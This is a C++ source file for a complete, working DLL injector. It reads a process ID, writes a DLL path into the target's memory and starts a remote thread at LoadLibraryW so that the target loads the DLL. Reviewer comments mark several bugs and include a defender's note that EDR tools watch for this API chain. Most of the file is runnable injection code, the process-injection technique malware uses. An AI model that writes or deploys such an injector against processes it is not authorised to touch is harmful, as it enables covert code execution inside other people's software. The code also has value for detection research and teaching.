// DLL Injection using CreateRemoteThread()
#include <Windows.h>
#include <iostream>
#include <WinBase.h>
using namespace std;
// Entry point. Reads a PID from the console, then makes the target process load
// a DLL by creating a remote thread whose start routine is kernel32!LoadLibraryW
// and whose argument is a copy of the DLL path written into the target.
//
// Defender's note: the OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread(LoadLibraryW) chain below is the textbook
// CreateRemoteThread injection primitive. That cross-process API sequence
// (handle open with VM_WRITE/CREATE_THREAD, remote allocation and write,
// remote thread whose start address is LoadLibraryW) is exactly what
// process-injection detections in EDR/ETW-based tooling are built to observe.
//
// @param hInstance, hPrevInstance, lpCmdLine, nShowCmd  Standard wWinMain
//        arguments; none of them is used - the PID comes from stdin instead.
// @return 0 once the remote thread was created (whether or not it finished
//         inside the 5 s wait), 1 on any failure before that point.
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
    // A console is created and stdout re-pointed at it so wcout/wcin work
    // (presumably because the binary is linked for the Windows GUI subsystem,
    // which is what wWinMain suggests).
    AllocConsole();
    FILE* consoleOutput;
    if (freopen_s(&consoleOutput, "CONOUT$", "w", stdout) != 0) {
        MessageBox(NULL, L"Failed to redirect standard output to console window", L"Error", MB_OK | MB_ICONERROR);
        return 1;
    }
    // Opening a target process
    wcout << "Hi! Welcome to the DLL Injector!" << endl;
    // NOTE(review): process_id is left uninitialized and wcin's fail state is
    // never checked, so non-numeric input reaches OpenProcess with an
    // indeterminate PID.
    DWORD process_id;
    wcout << "Please enter the process ID inside whom you want to inject the target DLL: " << endl;
    wcin >> process_id;
    wcin.ignore();
    LPVOID dll_to_inject;
    // The DLL path is a compile-time constant. It is copied verbatim (including
    // the terminating NUL) into the target below, so it has to fit in the single
    // 4 KiB page allocated there; no length check guards that.
    wchar_t dll_path[] = L"C:\\Users\\user_demo.dll"; //Replace the path of your DLL
    dll_to_inject = (LPVOID)dll_path;
    // Requests write, allocation/free and thread-creation rights on the target;
    // a NULL handle (bad PID, insufficient privilege, protected process) is the
    // first failure point.
    HANDLE _OpenProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, process_id);
    if (_OpenProcess == NULL) {
        // NOTE(review): the pause runs before the message is printed, so the
        // user sees the "Press any key" prompt with no explanation until after
        // pressing it. Same ordering issue in the allocation-failure branch.
        system("PAUSE");
        wcout << "Failed to open process with proper access masks" << endl;
        return 1;
    }
    // Allocating buffer after opening the target process above
    // 1 << 12 == 4096 bytes: one read/write page in the target's address space
    // that will hold the DLL path string.
    void* allocated_memory = VirtualAllocEx(_OpenProcess, NULL, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // This is returning the buffer allocated address
    if (!allocated_memory) {
        system("PAUSE");
        wcout << "The buffer allocation failed" << endl;
        CloseHandle(_OpenProcess);
        return 1;
    }
    // Now, need to add the DLL inside the allocated buffer returned by VirtualAllocEx
    // Copies the path plus its NUL terminator; the final NULL argument means the
    // number of bytes actually written is not retrieved or checked.
    BOOL _WriteProcessMemory = WriteProcessMemory(_OpenProcess, allocated_memory, dll_to_inject, (::wcslen((const wchar_t*)dll_to_inject) + 1) * sizeof(wchar_t), NULL);
    if (!_WriteProcessMemory) {
        wcout << "Failed to write process" << endl;
        VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
        CloseHandle(_OpenProcess);
        return 1;
    }
    // Create the thread inside the target process
    // The LoadLibraryW address is resolved in *this* process and reused in the
    // target, i.e. it relies on kernel32 being mapped at the same base in both.
    // NOTE(review): the GetProcAddress result is not checked; if it were NULL,
    // a NULL start address would be handed to CreateRemoteThread.
    DWORD tid;
    HANDLE hThread = CreateRemoteThread(_OpenProcess, NULL, 0, (LPTHREAD_START_ROUTINE)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), allocated_memory, 0, &tid);
    if (!hThread) {
        wcout << "Failed to create the remote thread" << endl;
        VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
        CloseHandle(_OpenProcess);
        return 1;
    }
    wcout << "Thread " << tid << " created successfully!" << endl;
    // Waits up to 5 s for LoadLibraryW to return in the target. Only the timeout
    // is distinguished; WAIT_FAILED/WAIT_ABANDONED fall into the same else-branch.
    if (WAIT_OBJECT_0 == ::WaitForSingleObject(hThread, 5000)) {
        wcout << "Thread exited." << endl;
    }
    else {
        wcout << "Thread still hanging around..." << endl;
    }
    // NOTE(review): the path buffer is released unconditionally, including on
    // the timeout branch above where the remote thread may still be reading it.
    VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
    CloseHandle(hThread);
    CloseHandle(_OpenProcess);
    // The earlier error returns skip these two; the OS reclaims the stream and
    // console at process exit, so only this success path tears them down.
    fclose(consoleOutput);
    FreeConsole();
    return 0;
}